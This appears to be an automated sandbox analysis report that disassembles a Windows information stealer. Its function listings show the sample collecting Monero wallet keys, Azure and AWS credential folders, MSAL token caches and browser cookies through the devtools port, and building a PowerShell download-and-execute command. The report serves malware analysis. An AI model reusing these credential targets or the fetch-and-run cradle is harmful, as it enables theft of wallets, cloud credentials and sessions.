                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 79df1a29291beeb596bbd728a95ecc70382a5c2540af5105b2959bb4224d3fd5
                                • Instruction ID: 4d5258ed2bae988482b7aac1413f8dfef7610cf45e58254b9bdd1975c24a47c7
                                • Opcode Fuzzy Hash: 79df1a29291beeb596bbd728a95ecc70382a5c2540af5105b2959bb4224d3fd5
                                • Instruction Fuzzy Hash: 76A15E71E10205ABCB21EF64FC89AAE7BF9AF44354F446068FA45F7241DB34ED418BA4
                                Function 00E5E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00E5E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E5E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00E5E7C6
                                • memset.MSVCRT ref: 00E5E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E5E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00E5E886
                                • memset.MSVCRT ref: 00E5E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E5E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E920
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E5E947
                                • memset.MSVCRT ref: 00E5E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: d72b2d2de4a076f0e1b87c5220b42e4d7b3a88093b26ee79c766697df2cd48d4
                                • Instruction ID: a01c229d30f7a215c0383cd44005836f9c0fbe89f99990106c6dc1988cd21f5c
                                • Opcode Fuzzy Hash: d72b2d2de4a076f0e1b87c5220b42e4d7b3a88093b26ee79c766697df2cd48d4
                                • Instruction Fuzzy Hash: 1B711B71E50218AFDB25EB64DC46FED77B4AF48300F405898BB19BB2C1DB749B448B94
                                Function 00E5ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 00E5ABCF
                                • lstrlen.KERNEL32(016CEB28), ref: 00E5ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ACB7
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E5ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ACF3
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E5ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD28
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E5AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD5C
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E5AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD91
                                • lstrlen.KERNEL32(016CEBD0), ref: 00E5ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AE6F
                                • lstrlen.KERNEL32(00000000), ref: 00E5AE85
                                • lstrcpy.KERNEL32(00000000,016CEB58), ref: 00E5AEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 458ef7f273e72959a5b4f1cc927c8b00b9bd436fa67fd653a5785f97b59ffe68
                                • Instruction ID: f74a5a36f1a0b6fc639e34e8bd664e59168b35792530e3e51eb092766b7d7db9
                                • Opcode Fuzzy Hash: 458ef7f273e72959a5b4f1cc927c8b00b9bd436fa67fd653a5785f97b59ffe68
                                • Instruction Fuzzy Hash: 8CB190309101169BCB32EF68EC49AAFB3B5AF4430AF486938BD45B7245DB35DD05CBA1
                                Function 00E647E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,00E572A4), ref: 00E647E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 00E647FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00E6480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00E6481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 00E6482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00E64840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 00E64851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 00E64862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00E64873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00E64884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 00E64895
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 812668cc6270bf7f6ee11fe8b81e137d61c0015473f75af3ba2417dc706d83de
                                • Instruction ID: fbfb0ee01ca67f183e1f9778a30c64a6e2d08b595243b0a9b726edd5d3a36b0f
                                • Opcode Fuzzy Hash: 812668cc6270bf7f6ee11fe8b81e137d61c0015473f75af3ba2417dc706d83de
                                • Instruction Fuzzy Hash: BC11B172DA2B14AFD731DFB4A80DA593AB8BA0971A3549C1BF1D5F2148D7FE4000DB90
                                Function 00E5BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5BE53
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E5BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00E5BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5BEEB
                                • lstrlen.KERNEL32(')"), ref: 00E5BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 00E5BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E5BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00E5BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 00E5C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 05b3ad77653bfbf0fee836458cb24cb99e442f15bf6da10226f95ab348a1a6d4
                                • Instruction ID: 02e422a603a052b1994a12a67408ed5da82ee8b01376977451714798bde7853c
                                • Opcode Fuzzy Hash: 05b3ad77653bfbf0fee836458cb24cb99e442f15bf6da10226f95ab348a1a6d4
                                • Instruction Fuzzy Hash: EE61C771E10209AFCB21AFB4AC495AF7BF9AF04319F146829FE45F7241DB34D9058BA1
                                Function 00E61820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6184F
                                • lstrlen.KERNEL32(016B6EF0), ref: 00E61860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E618C1
                                • lstrlen.KERNEL32(00E74FA0), ref: 00E618D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E618F4
                                • lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E61900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6192F
                                • lstrlen.KERNEL32(016B6FC0), ref: 00E61945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E6196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E619A6
                                • lstrlen.KERNEL32(00E74FA0), ref: 00E619B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E619D9
                                • lstrcat.KERNEL32(00000000,00E74FA0), ref: 00E619E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A14
                                • lstrlen.KERNEL32(016B6F20), ref: 00E61A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61A8B
                                • lstrlen.KERNEL32(016B7020), ref: 00E61AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61B02
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 4bbec5546bb9a76f80288810f44a24dd2a53b47eaecb358259f4c542292b02bf
                                • Instruction ID: 3332d117f83689e12d99003c2e6bfd7b8230656a896f5dbfb816bdb7c3a9b679
                                • Opcode Fuzzy Hash: 4bbec5546bb9a76f80288810f44a24dd2a53b47eaecb358259f4c542292b02bf
                                • Instruction Fuzzy Hash: D4915170A413029FD7319FB9FC88A1677E8AF54358B18A86DB9C6F3245DB35E841CB60
                                Function 00E54760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E547C5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54812
                                • lstrlen.KERNEL32(00E74B60), ref: 00E5481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5483A
                                • lstrcat.KERNEL32(00000000,00E74B60), ref: 00E54846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E548A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E548CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 00E548DC
                                • lstrlen.KERNEL32(?), ref: 00E548F0
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54931
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E549B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E549E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54A5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: a2d64443a85b9022eb0bd79c99e2dde5cf1db58df5f76f8fed1a7a6c674406d8
                                • Instruction ID: 0fde347cac1bcd3140c67f14c0df7650f70614638ae894b208587f15dc964a7d
                                • Opcode Fuzzy Hash: a2d64443a85b9022eb0bd79c99e2dde5cf1db58df5f76f8fed1a7a6c674406d8
                                • Instruction Fuzzy Hash: A8B191B1A112059BCB31EF78E88A9AE77F5AF44309F446828FD46B7341DB34ED458B90
                                Function 00E492B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E490C0: InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E490DF
                                  • Part of subcall function 00E490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E490FC
                                  • Part of subcall function 00E490C0: InternetCloseHandle.WININET(00000000), ref: 00E49109
                                • strlen.MSVCRT ref: 00E492E1
                                • strlen.MSVCRT ref: 00E492FA
                                  • Part of subcall function 00E48980: std::_Xinvalid_argument.LIBCPMT ref: 00E48996
                                • strlen.MSVCRT ref: 00E49399
                                • strlen.MSVCRT ref: 00E493E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00E49547
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E49559
                                • lstrcat.KERNEL32(?,?), ref: 00E4956A
                                • lstrcat.KERNEL32(?,00E74B98), ref: 00E4957C
                                • lstrcat.KERNEL32(?,?), ref: 00E4958D
                                • lstrcat.KERNEL32(?,.txt), ref: 00E4959F
                                • lstrlen.KERNEL32(?), ref: 00E495B6
                                • lstrlen.KERNEL32(?), ref: 00E495DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E49614
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: cd9b87b41fb874b06fbce1abccc60c51fabac107c4007a42ff488f8bca418b80
                                • Instruction ID: d7608f86ea2ba53e796cf57dba5cd159a5eed8723284258b5d2581bfaace729f
                                • Opcode Fuzzy Hash: cd9b87b41fb874b06fbce1abccc60c51fabac107c4007a42ff488f8bca418b80
